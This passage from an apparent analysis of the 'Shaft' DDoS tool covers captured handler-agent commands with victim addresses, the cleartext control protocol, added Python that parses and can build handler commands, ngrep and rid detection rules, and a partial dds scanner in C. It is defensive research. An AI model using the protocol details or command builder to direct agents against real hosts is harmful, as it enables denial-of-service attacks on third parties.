        Sun 11/28 21:45:59    udp    129.22.64.17.1046   ->    x.x.x.x.18753 
        Sun 11/28 21:45:59    udp    129.22.64.17.1147   ->    x.x.x.x.18753 
        Sun 11/28 21:45:59    udp    129.22.64.17.1248   ->    x.x.x.x.18753 
        Sun 11/28 21:45:59    udp    129.22.64.17.1451   ->    x.x.x.x.18753 
        Sun 11/28 21:46:00    udp    x.x.x.x.33201  ->    129.22.64.17.20433 
        Sun 11/28 21:46:00    udp    x.x.x.x.33202  ->    129.22.64.17.20433 
        Sun 11/28 21:46:01    udp    x.x.x.x.33203  ->    129.22.64.17.20433 
        Sun 11/28 21:48:37    udp    129.22.64.17.1037   ->    x.x.x.x.18753 
        Sun 11/28 21:48:37    udp    129.22.64.17.1239   ->    x.x.x.x.18753 
        Sun 11/28 21:48:37    udp    129.22.64.17.1340   ->    x.x.x.x.18753 
        Sun 11/28 21:48:37    udp    129.22.64.17.1442   ->    x.x.x.x.18753 
        Sun 11/28 21:48:38    udp    x.x.x.x.33204  ->    129.22.64.17.20433 
        Sun 11/28 21:48:38    udp    x.x.x.x.33205  ->    129.22.64.17.20433 
        Sun 11/28 21:48:38    udp    x.x.x.x.33206  ->    129.22.64.17.20433 
        Sun 11/28 21:48:56    udp    129.22.64.17.1644   ->    x.x.x.x.18753 
        Sun 11/28 21:48:56    udp    x.x.x.x.33207  ->    129.22.64.17.20433 
        Sun 11/28 21:49:59    udp    x.x.x.x.33208  ->    129.22.64.17.20433 
        Sun 11/28 21:50:00    udp    x.x.x.x.33209  ->    129.22.64.17.20433 
        Sun 11/28 21:50:14    udp    129.22.64.17.1747   ->    x.x.x.x.18753 
        Sun 11/28 21:50:14    udp    x.x.x.x.33210  ->    129.22.64.17.20433 
      
        There is quite some activity between the handler and the agent, as they
        go through the command request and acknowledgement phases. There 
        was also what appeared to be testing of the impact on the local 
        network itself with ICMP packet flooding, for which we omit the data 
        here due to size limitations.
        
        Let us look at the individual phases from a later attack.
        
        Setup and configuration phase:
              
        date        time      src              dest         dest-port command
      
        4 Dec 1999  18:06:40  129.22.64.17     x.x.x.x       18753    alive tijgu hi 5 8170
        4 Dec 1999  18:09:14  129.22.64.17     x.x.x.x       18753    time tijgu 700 5 6437                                     
        4 Dec 1999  18:09:14  x.x.x.x      129.22.64.17      20433    time tijgu 5 6437 700                                     
        4 Dec 1999  18:09:16  129.22.64.17     x.x.x.x       18753    size tijgu 4096 5 8717                                    
        4 Dec 1999  18:09:16  x.x.x.x      129.22.64.17      20433    size tijgu 5 8717 4096                                    
        4 Dec 1999  18:09:23  129.22.64.17     x.x.x.x       18753    type tijgu 2 5 9003            
              
        The handler issues an "alive" command, and says "hi" to its agent,
        assigning a socket number of "5" and a ticket number of 8170. We will see
        that this "socket number" will persist throughout this attack. A time
        period of 700 seconds is assigned to the agent, which is acknowledged. A
        packet size of 4096 bytes is specified, which is again confirmed.  The
        last line indicates the type of attack, in this case "the works", i.e.
        UDP, TCP SYN and ICMP packet flooding combined. Failure to specify the type
        would make the agent default to UDP packet flooding.
      
        Now the list of hosts to attack and which ones they want statistics from
        on completion:
      
        date        time      src              dest         dest-port command
        
        4 Dec 1999  18:09:24  129.22.64.17     x.x.x.x       18753    own tijgu 207.229.143.6 5 5256       
        4 Dec 1999  18:09:24  x.x.x.x      129.22.64.17      20433    owning tijgu 5 5256 207.229.143.6 
        4 Dec 1999  18:09:24  129.22.64.17     x.x.x.x       18753    pktres tijgu 207.229.143.6 5 1993  
        4 Dec 1999  18:09:24  129.22.64.17     x.x.x.x       18753    own tijgu 24.7.231.128 5 78       
        4 Dec 1999  18:09:24  129.22.64.17     x.x.x.x       18753    pktres tijgu 24.218.58.101 5 8845 
        4 Dec 1999  18:09:24  129.22.64.17     x.x.x.x       18753    own tijgu 18.85.13.107 5 6247    
        4 Dec 1999  18:09:25  129.22.64.17     x.x.x.x       18753    own tijgu 24.218.52.44 5 4190
        4 Dec 1999  18:09:25  129.22.64.17     x.x.x.x       18753    own tijgu 207.175.72.15 5 2376 
        4 Dec 1999  18:09:25  x.x.x.x      129.22.64.17      20433    owning tijgu 5 78 24.7.231.128 
        4 Dec 1999  18:09:26  x.x.x.x      129.22.64.17      20433    owning tijgu 5 6247 18.85.13.107
        4 Dec 1999  18:09:27  x.x.x.x      129.22.64.17      20433    owning tijgu 5 4190 24.218.52.44
        4 Dec 1999  18:09:28  x.x.x.x      129.22.64.17      20433    owning tijgu 5 2376 207.175.72.15
        4 Dec 1999  18:21:04  x.x.x.x      129.22.64.17      20433    pktres rghes 5 1993 51600 
        4 Dec 1999  18:21:04  x.x.x.x      129.22.64.17      20433    pktres rghes 0 0 51400   
        4 Dec 1999  18:21:07  x.x.x.x      129.22.64.17      20433    pktres rghes 0 0 51500  
        4 Dec 1999  18:21:07  x.x.x.x      129.22.64.17      20433    pktres rghes 0 0 51400  
        4 Dec 1999  18:21:07  x.x.x.x      129.22.64.17      20433    pktres rghes 0 0 51400            
       
        Now that all other parameters are set, the handler issues several "own"
        commands, in effect specifying the victim hosts. Those commands are
        acknowledged by the agent with an "owning" reply. The flooding starts as
        soon as the first victim host is added. The handler also requests packet
        statistics from the agent for certain victim hosts (e.g. "pktres tijgu
        207.229.143.6 5 1993"). Note that the reply comes back with the same
        identifiers ("5 1993") at the end of the 700 second packet flood,
        indicating that 51600 sets of packets were sent. Since all three types
        (UDP, TCP SYN and ICMP) were configured, each set is three packets, so a
        successful flood amounts to 51600 x 3 = 154800 packets in 700 seconds:
        roughly 220 4096-byte packets per second per host, or about 900
        kilobytes per second per victim host from this agent alone, and about
        4.5 megabytes per second in total for this little exercise.
      
        Note the reverse shift ("shift" becomes "rghes", rather than "tijgu") for
        the password on the packet statistics.
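        The exchange above, replayed in code. This is an added example in Python
        and not code from the original analysis or from Shaft itself. It assumes
        the +1 letter shift ("shift" to "tijgu"), the -1 shift on the statistics
        reply ("rghes"), and the field order seen in the capture (requests carry
        the arguments before socket and ticket, replies after them); direction is
        identified by destination port only, because the agent address is masked
        as x.x.x.x in the capture. The CAPTURE list is transcribed from the
        4 Dec 1999 packets; the "type 2 = all three packet types" mapping is taken
        from the text, and every other type value is assumed to be a single
        packet type.

```python
"""Codec for Shaft handler<->agent control messages plus the yield arithmetic
from the captured session (added example, not Shaft's own code)."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

DEFAULT_PASSWORD = "shift"
AGENT_PORT = 18753    # agent listens here; handler -> agent requests
HANDLER_PORT = 20433  # handler listens here; agent -> handler replies


def caesar(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions, wrapping within the alphabet."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


@dataclass
class ShaftMsg:
    cmd: str
    shift: int          # +1 for the normal password, -1 on the pktres reply
    socket: int
    ticket: int
    args: List[str]
    is_reply: bool


def parse(payload: str, dport: int, password: str = DEFAULT_PASSWORD) -> Optional[ShaftMsg]:
    """Decode one UDP payload; None if password or layout is not Shaft's."""
    f = payload.split()
    if len(f) < 4:
        return None
    shifts = {caesar(password, 1): 1, caesar(password, -1): -1}   # assumption: +1 / -1 only
    if f[1] not in shifts:
        return None
    try:
        if dport == AGENT_PORT:        # request: "<cmd> <pw> <args...> <socket> <ticket>"
            sock, ticket, args, reply = int(f[-2]), int(f[-1]), f[2:-2], False
        elif dport == HANDLER_PORT:    # reply:   "<cmd> <pw> <socket> <ticket> <args...>"
            sock, ticket, args, reply = int(f[2]), int(f[3]), f[4:], True
        else:
            return None
    except ValueError:
        return None
    return ShaftMsg(f[0], shifts[f[1]], sock, ticket, args, reply)


def build_request(cmd: str, args: List[str], socket: int, ticket: int,
                  password: str = DEFAULT_PASSWORD) -> str:
    """Wire form of a handler -> agent command."""
    return " ".join([cmd, caesar(password, 1), *args, str(socket), str(ticket)])


def session_summary(capture: List[Tuple[int, str]], password: str = DEFAULT_PASSWORD) -> Dict:
    """Replay (dest_port, payload) records and compute the agent's flood yield."""
    params: Dict[str, Optional[int]] = {"time": None, "size": None, "type": None}
    victims: List[str] = []
    pending: Dict[Tuple[str, int, int], ShaftMsg] = {}   # outstanding requests by (cmd, socket, ticket)
    sets: Dict[str, int] = {}                            # victim (or "unrequested") -> packet sets
    for dport, payload in capture:
        m = parse(payload, dport, password)
        if m is None:
            continue
        if not m.is_reply:
            if m.cmd in params:
                params[m.cmd] = int(m.args[0])
            elif m.cmd == "own":
                victims.append(m.args[0])
            pending[(m.cmd, m.socket, m.ticket)] = m
        elif m.cmd == "pktres":
            req = pending.get(("pktres", m.socket, m.ticket))
            key = req.args[0] if req else "unrequested"
            sets[key] = sets.get(key, 0) + int(m.args[0])
    # Per the analysis, type 2 = UDP + TCP SYN + ICMP, i.e. three packets per set.
    # Treating every other type value as one packet per set is an assumption.
    per_set = 3 if params["type"] == 2 else 1
    duration, size = params["time"] or 1, params["size"] or 0
    per_host = {k: {"pps": n * per_set / duration,
                    "bytes_per_s": n * per_set * size / duration} for k, n in sets.items()}
    return {**params, "victims": victims, "per_host": per_host,
            "total_bytes_per_s": sum(v["bytes_per_s"] for v in per_host.values())}


# Transcribed from the 4 Dec 1999 capture above: (dest port, payload).
CAPTURE = [
    (18753, "alive tijgu hi 5 8170"),
    (18753, "time tijgu 700 5 6437"), (20433, "time tijgu 5 6437 700"),
    (18753, "size tijgu 4096 5 8717"), (20433, "size tijgu 5 8717 4096"),
    (18753, "type tijgu 2 5 9003"),
    (18753, "own tijgu 207.229.143.6 5 5256"), (20433, "owning tijgu 5 5256 207.229.143.6"),
    (18753, "pktres tijgu 207.229.143.6 5 1993"),
    (18753, "own tijgu 24.7.231.128 5 78"),
    (18753, "pktres tijgu 24.218.58.101 5 8845"),
    (18753, "own tijgu 18.85.13.107 5 6247"),
    (18753, "own tijgu 24.218.52.44 5 4190"),
    (18753, "own tijgu 207.175.72.15 5 2376"),
    (20433, "pktres rghes 5 1993 51600"),
    (20433, "pktres rghes 0 0 51400"), (20433, "pktres rghes 0 0 51500"),
    (20433, "pktres rghes 0 0 51400"), (20433, "pktres rghes 0 0 51400"),
]

if __name__ == "__main__":
    s = session_summary(CAPTURE)
    print(build_request("own", ["207.229.143.6"], 5, 5256))
    print(s["victims"], s["per_host"]["207.229.143.6"], round(s["total_bytes_per_s"]))
```

        Run as a script it prints the wire form of an "own" command and the
        per-host yield; with the captured numbers the requested host works out
        to about 221 packets and 906 kilobytes per second, and the five reports
        together to about 4.5 megabytes per second, matching the figures above.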
        
      
      -- 3.5.3 Detection at the network level
        
        Scanning the network for open port 20432 will reveal the presence of a
        handler on your LAN. 
        
        For detecting idle agents, one could write a program similar to George
        Weaver's trinoo detector. Sending out "alive" messages with the default
        password to all nodes on a network on the default UDP port 18753 will
        generate traffic back to the detector, making the agent believe the
        detector is a handler.
        
        This program does not provide for code updates (like TFN or Stacheldraht).
        This may imply "rcp" or "ftp" connections during the initial 
        intrusion phase (see also [5]).
        
        The program uses UDP traffic for its communication between the handlers
        and the agents. Considering that the traffic is not encrypted, it can
        easily be detected based on certain keywords. Performing an "ngrep" [11]
        for the keywords mentioned in the syntax sections (3.3.1 and 3.3.2), will
        locate the control traffic, and looking for TCP packets with sequence
        numbers of 0x28374839 may locate the TCP SYN packet flood traffic. 
        Source ports are always 1024 or higher, and source IP numbers can
        include zeroes in the leading octet.
      
        Strings in this control traffic can be detected with the "ngrep"
        program using the same technique shown in [5], [6], and [7]. For 
        example,
      
        # ngrep -i -x "alive tijgu" udp
        
        # ngrep -i -x "pktres|pktstat" udp
        
        will locate the control traffic between the handler and the agent, 
        independently of the port number used.
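        The same indicators applied to raw IPv4 packets instead of to an ngrep
        pattern. This is an added example in Python, not part of the original
        analysis nor of ngrep, dds or rid. It checks UDP payloads for a Shaft
        command word followed by either form of the shifted default password,
        flags the default ports, and looks for TCP SYNs carrying the fixed
        sequence number 0x28374839, noting the leading-zero source octet. The
        packets in SAMPLES are constructed here: the handler address is the one
        from the capture, the agent (192.0.2.10), the probing host and the
        spoofed flood source are invented, and checksums are left at zero since
        nothing verifies them.

```python
"""Network-level Shaft indicators over raw IPv4 packets (added example)."""
import ipaddress
import struct
from typing import Dict, List

SHAFT_SEQ = 0x28374839                      # fixed ISN of Shaft's TCP SYN flood
AGENT_PORT, HANDLER_PORT = 18753, 20433      # default UDP ports (agent, handler)
DEFAULT_PORTS = {AGENT_PORT, HANDLER_PORT}
# Command words from the syntax sections, and "shift" shifted +1 and -1.
SHAFT_WORDS = {"new", "alive", "time", "size", "type", "own", "owning", "pktres", "pktstat"}
SHAFT_PASSWORDS = {"tijgu", "rghes"}


def classify(pkt: bytes) -> List[str]:
    """Return the Shaft indicators found in one IPv4 packet (empty list if none)."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return []
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    src = ipaddress.IPv4Address(pkt[12:16])
    dst = ipaddress.IPv4Address(pkt[16:20])
    l4 = pkt[ihl:]
    found: List[str] = []
    if proto == 17 and len(l4) >= 8:                        # UDP: control channel
        sport, dport = struct.unpack("!HH", l4[:4])
        words = l4[8:].decode("ascii", "replace").split()
        if len(words) >= 2 and words[0] in SHAFT_WORDS and words[1] in SHAFT_PASSWORDS:
            found.append(f"control:{words[0]} {src}:{sport}->{dst}:{dport}")
        if sport in DEFAULT_PORTS or dport in DEFAULT_PORTS:
            found.append("default-port")
    elif proto == 6 and len(l4) >= 20:                      # TCP: SYN flood
        sport, dport, seq = struct.unpack("!HHI", l4[:8])
        if seq == SHAFT_SEQ and l4[13] & 0x02:               # SYN bit with the hard-coded ISN
            found.append(f"flood:fixed-seq {src}:{sport}->{dst}:{dport}")
            # Shaft's generator never emits a source port below 1024, while the
            # rand()%255 octets do produce a leading zero.
            if sport < 1024:
                found.append("sport<1024 (odd for Shaft)")
            if int(src) >> 24 == 0:
                found.append("leading-zero-octet source")
    return found


def ipv4(proto: int, src: str, dst: str, payload: bytes) -> bytes:
    """Minimal IPv4 header (no options, checksum zero) in front of payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr + payload


def udp(sport: int, dport: int, data: bytes) -> bytes:
    return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data


def tcp_syn(sport: int, dport: int, seq: int) -> bytes:
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 65535, 0, 0)


# Constructed sample traffic (see lead-in); "probe" is the payload dds/rid send.
SAMPLES: Dict[str, bytes] = {
    "own": ipv4(17, "129.22.64.17", "192.0.2.10",
                udp(1765, AGENT_PORT, b"own tijgu 207.229.143.6 5 5256")),
    "owning": ipv4(17, "192.0.2.10", "129.22.64.17",
                   udp(33198, HANDLER_PORT, b"owning tijgu 5 5256 207.229.143.6")),
    "probe": ipv4(17, "192.0.2.99", "192.0.2.10",
                  udp(40000, AGENT_PORT, b"alive tijgu hi 5 1918")),
    "flood": ipv4(6, "0.91.17.203", "207.229.143.6", tcp_syn(41812, 80, SHAFT_SEQ)),
    "dns": ipv4(17, "192.0.2.10", "192.0.2.1", udp(33199, 53, b"\x12\x34\x01\x00")),
    "syn": ipv4(6, "192.0.2.10", "207.229.143.6", tcp_syn(41812, 80, 0x1C2D3E4F)),
}


def scan(packets: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Classify every packet; only entries with indicators are worth alerting on."""
    return {name: classify(p) for name, p in packets.items()}


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(f"{name:7s} {hits if hits else 'clean'}")
```

        Note that a detector's own "alive" probe matches the control-traffic
        rule just as the handler's commands do, so a scan of the local network
        with dds or rid will itself show up in such a monitor.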
      
        There are also two excellent scanners for detecting DDoS agents on the 
        network: Dittrich's "dds" [8] and Brumley's "rid" [2]. 
        
        "dds" was written to provide a more portable means of scanning for
        various DDoS tools, with fewer dependencies. (Many people encountered
        problems with Perl and the Net::RawIP library [15] on their systems,
        which prevented them from using the scripts provided in [5], [6],
        and [7].) Due to time constraints during coding, "dds" does not have
        the flexibility necessary to specify arbitrary protocols, ports, and
        payloads. A modified version of "dds", geared towards detecting only
        "Shaft" agents, is included in the Appendix.
          
        A better means of detecting "Shaft" handlers and agents would be to
        use a program like "rid", which uses a more flexible configuration
        file mechanism to define ports, protocols, and payloads.
        
        A sample configuration for "rid" to detect the "Shaft" control traffic 
        as described:
        
        start shaft
              send udp dport=18753 data="alive tijgu hi 5 1918" 
              recv udp sport=20433 data="alive" nmatch=1
        end shaft
      
      -- 3.6 Defenses
      ---------------
        
        To protect against the effects of the multiple types of denial of
        service, we suggest that you review the other papers (see [1, 3, 5, 6, 
        7]) and other methods of dealing with DDoS attacks being discussed 
        and promoted (see [9]).
      
        For example, rate-limiting is considered effective against ICMP packet
        flooding attacks, while anti-spoof filters and egress filters at the
        border routers can limit the problems caused by attacking agents
        faking source addresses.
      
      -- 4. Further evolution
      -----------------------
      
        While the author(s) of this tool did not pursue the use of encryption
        for its control traffic, such an evolution is conceivable, since a Caesar
        cipher is already used to obfuscate the password. A transition to
        Blowfish or another real cipher is realistic, and changing the
        communication protocol to ICMP, much like TFN, is conceivable. The use
        of multicast protocols for either communication or packet flooding is
        also possible.
      
        To date, no source for the "Shaft" handler ("shaftmaster") has been
        obtained or analyzed.
      
        At this stage, the code is believed to be private.  This would mean that
        the authors could likely change defaults and the probability of detecting
        "script kiddie" copycats using default values as analyzed here is low.
        This would argue for rapid and widespread detection efforts to identify
        agents before this change.
      
      -- 5. Conclusion
      ----------------
      
        "Shaft" is another DDoS variant with independent origins. The code
        recovered did appear to be still in development. Several key
        features indicate evolutionary trends as the genre develops.
        Of significance is the priority placed on packet generation
        statistics which would allow host selection to be refined. The
        analysis of the code and binary was greatly enhanced by the capture
        of attack preparation and command packets. The captured packets 
        made it possible to assess the impact of a single agent that managed
        to saturate the network pipe.
        
        The version analyzed had hooks which would allow for dynamic changes
        to the master host and control port but not the agent control port.
        However such items are trivially incorporated and must not be taken
        to be indicative of any current versions which may be in active use.
        The obfuscation of master IP, ports and passwords used a relatively
        simple form of encryption but this could easily be strengthened.
      
        The detection of DDoS installations will become much more difficult
        as such metamorphosis techniques progress. The presence of such agents
        will still be determined most readily by analysis of traffic anomalies,
        with a consequent pressure on the time and resources of site
        administrators and security teams.
      
      
      -- APPENDIX A: References
      -------------------------
      
      [1]  Barlow, Jason and Woody Thrower. TFN2K  An Analysis
                   http://www2.axent.com/swat/News/TFN2k_Analysis.htm
      
      [2]  Brumley, David. Remote Intrusion Detector.
                   http://theorygroup.com/Software/RID
      
      [3]  CERT Distributed System Intruder Tools Workshop report
                   http://www.cert.org/reports/dsit_workshop.pdf
      
      [4]  CERT Advisory CA-99-17 Denial-of-Service Tools
                   http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
             
      [5]  Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool
                   http://staff.washington.edu/dittrich/misc/trinoo.analysis
      
      [6]  Dittrich, David. The "Tribe Flood Network" distributed denial of service attack tool
                   http://staff.washington.edu/dittrich/misc/tfn.analysis
      
      [7]  Dittrich, David. The "Stacheldraht" distributed denial of service attack tool
                   http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
      
      [8]  Dittrich, David, Marcus Ranum, George Weaver, David Brumley et al. dds, a distributed DoS tool scanner
                   http://staff.washington.edu/dittrich/dds
      
      [9]  Dittrich, David, Distributed Denial of Service (DDoS) Attacks/Tools
                   http://staff.washington.edu/dittrich/misc/ddos/
      
      [10] lsof:
                   http://vic.cc.purdue.edu/
      
      [11] ngrep:
                   http://www.packetfactory.net/ngrep/
              
      [12] Packet Storm Security, Distributed denial of service attack tools
                   http://packetstorm.securify.com/distributed/
                    
      [13] Phrack Magazine, Volume Seven, Issue Forty-Nine,
              File 06 of 16, [ Project Loki ]
                   http://www.phrack.com/search.phtml?view&article=p49-6
      
      [14] Phrack Magazine  Volume 7, Issue 51 September 01, 1997,
              article 06 of 17 [ L O K I 2   (the implementation) ]
                   http://www.phrack.com/search.phtml?view&article=p51-6
       
      [15] Net::RawIP:
                   http://quake.skif.net/RawIP
      
      [16] tcpdump:
                   ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
      
      [17] Schneier, Bruce. Applied Cryptography, 2nd edition, Wiley.
      
      [18] Stevens, W. Richard and Gary R. Wright. TCP/IP Illustrated, Vol. I, II,
           and III., Addison-Wesley.
      
      [19] Zuckerman, M.J. Net hackers develop destructive new tools. USA Today,
           7 December 1999.
                   http://www.usatoday.com/life/cyber/tech/review/crg681.htm
      
      -- APPENDIX B: dds ("Shaft" only variant)
      
      /*
       * dds $Revision: 1.6s $ - a distributed DoS tool scanner - Shaft only
       * 
       * Based on the gag scanner, written by David Dittrich, University
       * of Washington, Marcus Ranum, Network Flight Recorder, with
       * code contributed by others, and based on an idea stolen from
       * George Weaver, Pennsylvania State University.
       * 
       * Dave Dittrich <dittrich@cac.washington.edu>
       * Marcus Ranum <mjr@nfr.net>
       * George Weaver <gmw@psu.edu>
       * David Brumley <dbrumley@rtfm.stanford.edu>
       */
      
      /* Shaft only version, modified to that effect by 
       * Sven Dietrich <spock@sled.gsfc.nasa.gov>
       */
      
      #if YOU_HAVE_NOT_READ_THIS_YET
      
      This software should only be used in compliance with all applicable laws and
      the policies and preferences of the owners of any networks, systems, or hosts
      scanned with the software
      
      The developers and licensors of the software provide the software on an "as
      is" basis, excluding all express or implied warranties, and will not be liable
      for any damages arising out of or relating to use of the software.
      
      THIS SOFTWARE IS MADE AVAILABLE "AS IS", AND THE UNIVERSITY OF WASHINGTON
      DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, WITH REGARD TO THIS SOFTWARE,
      INCLUDING WITHOUT LIMITATION ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
      FITNESS FOR A PARTICULAR PURPOSE, AND IN NO EVENT SHALL THE UNIVERSITY OF
      WASHINGTON BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
      DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
      ACTION OF CONTRACT, TORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING
      OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.  
      
      #endif
      
      #define VERSION "$Revision: 1.6s $"
      
      #include <stdlib.h>
      #include <ctype.h>
      #include <signal.h>
      #include <stdio.h>
      #include <string.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <sys/wait.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netinet/in_systm.h>
      #include <netinet/ip.h>
      #include <netinet/udp.h>
      #include <netdb.h>
      #include <arpa/inet.h>
      #include <netinet/ip_icmp.h>
      
      #define BS 1024
      #define __FAVOR_BSD
      
      /* The two arrays below are for address range calculations.  They
         should have been automatically generated, but
         1) I am lazy.
         2) There are a few special cases in them.
      
         I will not scan more than a /16.  When we do scan a CIDR block, we
         assume that it actually is a CIDR block, and do not scan the
         network or broadcast address.
      
         */
      
      static unsigned long MaskBits[] = {
        0x00000000,                   /* /0 */
        0x00000000,                   /* /1 */
        0x00000000,                   /* /2 */
        0x00000000,                   /* /3 */
        0x00000000,                   /* /4 */
        0x00000000,                   /* /5 */
        0x00000000,                   /* /6 */
        0x00000000,                   /* /7 */
        0x00000000,                   /* /8 */
        0x00000000,                   /* /9 */
        0x00000000,                   /* /10 */
        0x00000000,                   /* /11 */
        0x00000000,                   /* /12 */
        0x00000000,                   /* /13 */
        0x00000000,                   /* /14 */
        0x00000000,                   /* /15 */
        0xffff0000,                   /* /16, Class B */
        0xffff8000,                   /* /17, 128 * Class C */
        0xffffc000,                   /* /18, 64 * Class C */
        0xffffe000,                   /* /19, 32 * Class C */
        0xfffff000,                   /* /20, 16 * Class C */
        0xfffff800,                   /* /21, 8 * Class C */
        0xfffffc00,                   /* /22, 4 * Class C */
        0xfffffe00,                   /* /23, 2* Class C */
        0xffffff00,                   /* /24, Class C */
        0xffffff80,                   /* /25, 128 hosts */
        0xffffffc0,                   /* /26, 64 hosts */
        0xffffffe0,                   /* /27, 32 hosts */
        0xfffffff0,                   /* /28, 16 hosts */
        0xfffffff8,                   /* /29, 8 hosts */
        0xfffffffc,                   /* /30, 4 hosts (PPP link) */
        0xfffffffe,                   /* /31, invalid */
        0xffffffff,                   /* /32, host */
      };
      
      static int NumHosts[] = {
        0, 0, 0, 0,
        0, 0, 0, 0,
        0, 0, 0, 0,
        0, 0, 0, 0,                   /* don't scan more than a /16 */
        65534,                        /* These are all -2 so that we don't
                                         scan the broadcast addr or the
                                         network addr */
        32766,
        16382,
        8190,
        4094,
        2046,
        1022,
        510,
        254,
        126,
        62,
        30,
        14,
        6,
        2,
        0,
        1,
      };
      
      extern  char            *optarg;
      
      struct udppkt_t {
              struct ip       ipi;
              struct udphdr   udpi;
              char            buffer[BS];
      } udppkt;
      
      static void             listener();
      static int              usage();
      
      static int              vflg = 0;       /* verbosity */
      static int              dflg = 0;       /* debugging */
      
      /* shaft variables */
      static short            shaft_dstport = 18753;  /* agent listen port: probes go here */
      static short            shaft_rctport = 20433;  /* handler listen port: agent replies come from here */
      char                    shaft_scmd[] = "alive";
      char                    shaft_spass[] = "tijgu";
      char                    shaft_echostr[] = "alive";
      
      int 
      main(int argc, char **argv)
      {
              int             pid, host;
              char            target[128];
              unsigned long   target_host;
              struct in_addr  target_ip;
              int             mask;
              char *          mask_ptr;
              int             result;
              int             usock;
              char            buf[BS];
              struct sockaddr_in
                              usa;
              int             i;
              char            *jnk1;
              char            *jnk2;
              int             sleepytime = 500;
              int             bigsleep = 30;
              int             num_hosts;
              char            scmd[BS], spass[BS], sbuf[BS];
      
              while((i = getopt(argc,argv,"ds:S:v")) != -1) {
                      switch(i) {
                      case 'd':
                              dflg++;
                              break;
                      case 's':
                              sleepytime = atoi(optarg);
                              if(sleepytime <= 0) {
                                      fprintf(stderr,"WARNING: zero interping sleep time will probably overflow your system's transmit buffers and yield poor results\n");
                                      sleepytime = 1;
                              }
                              break;
                      case 'S':
                              bigsleep = atoi(optarg);
                              if(bigsleep <= 0) {
                                      /* restore the default before printing it; the original
                                         warned but kept the bad value */
                                      bigsleep = 30;
                                      fprintf(stderr,"WARNING: non-positive sleep value - staying with default of %d\n", bigsleep);
                              }
                              break;
                      case 'v':
                              vflg++;
                              break;
                      default:
                              exit(usage());
                      }
              }
      
              if(optind >= argc || argc - optind > 1)
                      exit(usage());
      
              mask_ptr = strchr(argv[optind], '/');
      
              /* if a CIDR block is passed in */
              if (mask_ptr) {
                *mask_ptr = '\0';
                mask_ptr ++;
                
                sscanf(mask_ptr, "%d", &mask);
                
              } else {
                printf("No mask passed, assuming host scan (/32)\n");
                mask = 32;
              }
      
                       
              result = inet_aton(argv[optind], &target_ip);
      
              if (result == 0) {
                fprintf(stderr, "%s: Bad IP address: %s\n", argv[0],
                        argv[optind]);
                exit(-1);
              }
      
              if (mask < 16) {
                fprintf(stderr, "Bad Network Admin!  Bad!  Do not scan more than a /16 at once!\n");
                exit(-1);
              }
      
              num_hosts = NumHosts[mask];
      
              if (num_hosts == 0) {
                fprintf(stderr, "Cannot scan a /%d.  Exiting...\n", mask);
                exit(-1);
              }
      
              if(vflg) {
                printf("Mask: %d\n", mask);
                printf("Target: %s\n", inet_ntoa(target_ip));
                printf("dds %s - scanning...\n\n", VERSION);
              }
      
              sprintf(sbuf,"%s %s hi 5 1918",shaft_scmd,shaft_spass);
      
              target_host = ntohl(target_ip.s_addr);
              target_host &= MaskBits[mask];
      
              target_ip.s_addr = htonl(target_host);
      
              if((pid = fork()) < 0) {
                      perror("cannot fork");
                      exit(1);
              }
      
              /* child side listens for return packets */
              if (pid == 0)
                      listener();
      
              sleep(1);
              
              /* main sweep loop - COULD be expanded to whole Internet but... */
              /* but that would be _very_ bad.... */
              while (num_hosts) {
                if (mask != 32) {
                  target_host ++;
                }
                target_ip.s_addr = htonl(target_host);
      
                num_hosts--;
      
                /* we really need to skip the network and broadcast addresses */
                if ((target_host & 0xff) == 0 || (target_host & 0xff) == 0xff)  {
                  if(vflg)
                    printf("Skipping special address %s\n", inet_ntoa(target_ip));
                  continue;
                }
      
                if(vflg)
                  printf("Probing address %s\n", inet_ntoa(target_ip));
                
                              /* shaft check */
                              bzero((char *) &usa, sizeof(usa));
                              usa.sin_family = AF_INET;
                              usa.sin_addr.s_addr = target_ip.s_addr;
                              usa.sin_port = htons(shaft_dstport);
      
                              if (dflg)
                                      fprintf(stderr,"Sending UDP to: %s\n",
                                              inet_ntoa(usa.sin_addr));
                              if ((usock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
                                      perror("cannot open UDP socket");
                                      exit(1);
                              }
      
                              i = sendto(usock,sbuf,strlen(sbuf), 0,
                                      (struct sockaddr *)&usa,
                                      sizeof(usa));
      
                              if (i < 0) {
                                      char ebuf[BS];
                                      sprintf(ebuf,"sendto: udp %s",
                                              inet_ntoa(usa.sin_addr));
                                      perror(ebuf);
                                      break;
                              }
                              close(usock);
      
                              usleep(sleepytime);
                      }
      
      
              /* wait for any late responses */
              if (dflg)
                      fprintf(stderr,"Waiting %d seconds for late responses.\n",
                              bigsleep);
              sleep(bigsleep);
      
              /* shut listener. if this fails the listener exits on its own */
              (void)kill(pid, SIGHUP);
              exit(0);
      }
      
      
      static  void    listener()
